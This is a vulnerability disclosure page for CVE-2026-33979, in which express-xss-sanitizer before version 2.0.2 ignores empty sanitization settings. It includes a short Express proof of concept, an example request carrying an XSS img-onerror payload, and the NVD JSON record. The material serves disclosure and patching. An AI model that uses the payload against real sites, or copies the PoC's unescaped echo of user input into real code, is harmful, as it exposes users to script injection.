CVE-2026-33979

/* * PoC for CVE-2026-33979 * This demonstrates how the empty allowedTags configuration is ignored in vulnerable versions. */ const express = require('express'); const xss = require('express-xss-sanitizer'); // Version < 2.0.2 const app = express(); app.use(express.json()); // Intended configuration: Allow NO tags (strict sanitization) // Vulnerability: This config is silently ignored, allowing default tags. app.use(xss({ allowedTags: [], allowedAttributes: {} })); app.post('/api/comment', (req, res) => { // Input should be sanitized to plain text, but HTML tags may persist const userInput = req.body.comment; res.send({ result: userInput }); }); app.listen(3000, () => { console.log('Server running on port 3000'); }); /* * Attack Request: * POST /api/comment HTTP/1.1 * Host: localhost:3000 * Content-Type: application/json * * { * "comment": "<img src=x onerror=alert('XSS')>" * } * * Expected Result (Safe): "<img src=x onerror=alert('XSS')>" (escaped) * Actual Result (Vulnerable): The <img> tag is returned unescaped or partially allowed, triggering alert. */

{"cve": {"id": "CVE-2026-33979", "sourceIdentifier": "[email protected]", "published": "2026-03-27T22:16:22.433", "lastModified": "2026-03-31T18:24:58.820", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Express XSS Sanitizer is Express 4.x and 5.x middleware which sanitizes user input data (in req.body, req.query, req.headers and req.params) to prevent Cross Site Scripting (XSS) attack. A vulnerability has been identified in versions prior to 2.0.2 where restrictive sanitization configurations are silently ignored. In version 2.0.2, the validation logic has been updated to respect explicitly provided empty configurations. Now, if allowedTags or allowedAttributes are provided (even if empty), they are passed directly to sanitize-html without being overridden."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-183"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:express_xss_sanitizer_project:express_xss_sanitizer:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2.0.2", "matchCriteriaId": "3BCCF0CB-E43F-4D70-A024-7EE81877DDC9"}]}]}], "references": [{"url": "https://github.com/AhmedAdelFahim/express-xss-sanitizer/commit/5623009ef11dcf095c163a38dea07b9cc22ad19f", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/AhmedAdelFahim/express-xss-sanitizer/releases/tag/v2.0.2", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/AhmedAdelFahim/express-xss-sanitizer/security/advisories/GHSA-3843-rr4g-m8jq", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}